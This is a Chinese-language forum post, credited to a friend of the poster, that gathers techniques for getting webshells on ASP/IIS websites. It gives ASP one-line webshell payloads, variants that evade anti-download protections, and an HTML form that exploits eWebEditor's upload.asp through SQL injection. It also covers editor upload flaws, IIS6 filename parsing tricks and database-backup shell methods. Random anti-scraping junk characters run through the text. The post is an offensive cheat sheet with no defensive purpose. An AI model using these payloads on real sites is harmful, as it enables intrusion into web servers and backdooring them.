- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式 t, _0 w& ^" W7 n
/ Y9 g; H, K' o2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp
8 e/ L( @; u" [5 W$ M+ B0 `
' Y M$ @0 |+ M4 z+ c( c9 J* F* T3.上传漏洞:
0 ]1 Q- a9 T$ J+ m2 O. t. b0 v
' k# I% o8 q" p! z2 R2 A4 @动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
+ O# n( |5 u% v: I3 {: m: U
2 j0 R7 U) m2 b( U8 Z0 T4 M逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件$ _5 m1 x0 Y5 ]& f. [: O
* J- ? J1 ]# @6 H X
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
1 L8 N% w1 e9 z$ y- n- W/ t0 B$ A然后在上传文件里面填要传的图片格式的ASP木马1 ^! S* x$ ~% `' o
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
" s2 _; m9 u$ P$ w$ B' v# d4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
6 x) y4 Z- s+ X: n9 c: ^" q1 E. l5 c
<html>
- [; [4 y7 v, a0 O6 o<head>
+ G: |3 j6 ]( u) r<title>ewebeditor upload.asp上传利用</title>
" d$ Q1 R( [) G2 e% M6 Y</head>( I# M% T# Y8 E2 K" x! S
<body>
' D6 m! p3 n* \8 D+ U<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
7 G* y0 g* }3 r; w<input type=file name=uploadfile size=100><br><br>
$ F3 t0 L' c! F* [" o<input type=submit value=Fuck>
g. W2 t% B* \; o8 S; R4 D5 e</form>
' b6 \( N2 ]1 g2 n V" x3 X8 ~$ G</body>* g1 C: Q3 k" Z& v1 O6 n* ~$ w
</form>% g" `, H2 g) V2 w
</html>
8 q7 R1 l! O. |; O5 U6 \, w, \; o$ T2 }* J" w
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
& X9 Y* l( \' h! x5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
3 `5 s1 ^; x/ N+ p& T$ f- y0 d z9 J, o6 G u7 Q2 ~5 ^
利用windows2003解析。建立zjq.asp的文件夹
& |2 @9 w% o: R. G$ ]
) M' f& e j( \* k6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型) ]- W9 M$ c6 b! A3 V# L5 J
8 y- T8 f7 Y2 \$ e' d% u8 O7.cuteeditor:类似ewebeditor! e( r) _/ ~; q1 g& k* \9 {& t
" p) I9 f+ I7 r* _
8.htmleditor:同上
. n i) H6 U& b5 G( A
r# |5 y' X& q& H. Z k9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
3 M7 _/ x& F! f* }4 M/ |0 ^9 ~. l+ Y" {. I, Q3 ]
<%execute request("value")%><%'<% loop <%:%>1 t0 C7 V: l* O; \& ]# M' D! l
) ~; J# ]3 v& @& N8 Q0 f
<%'<% loop <%:%><%execute request("value")%>5 ^. ]5 W0 L7 V: s1 y4 T
; E3 o; f7 x8 x" H9 {" {<%execute request("value")'<% loop <%:%># N" k1 m& q# p" x3 L' t
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
8 D* y5 J; e, }
1 H( Z; N" d- Y+ j10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞! d6 r5 B0 x7 x+ h& m
' s" ^4 V' r0 V+ X$ ?
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3( V* M' V' ~1 c& G: L; L: ^$ o8 g
% K0 D& x* P4 [7 K$ A. Y1 J6 O0 C解析漏洞得到webshell7 v+ K1 L6 g/ w& [. h4 n2 t8 A
( U7 d) z% @6 T( U$ [& G5 U12.mssql差异备份,日志备份,前提需知道web路径2 S0 o+ Q% s1 i
9 @, U% N8 J/ X/ y1 E2 L4 R
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell5 ] o/ T2 @/ A a+ \
( M0 W5 w+ l, b$ @% N14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell e x0 F: T: f
0 R# B! W! M6 o' `3 u. a7 f/ P2 W' p15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
& w7 c/ c" l6 Z, I" Z8 h6 ]; M" W8 ~2 r4 }2 o
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
3 j) {* d. P- ~- |- k- c* i不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|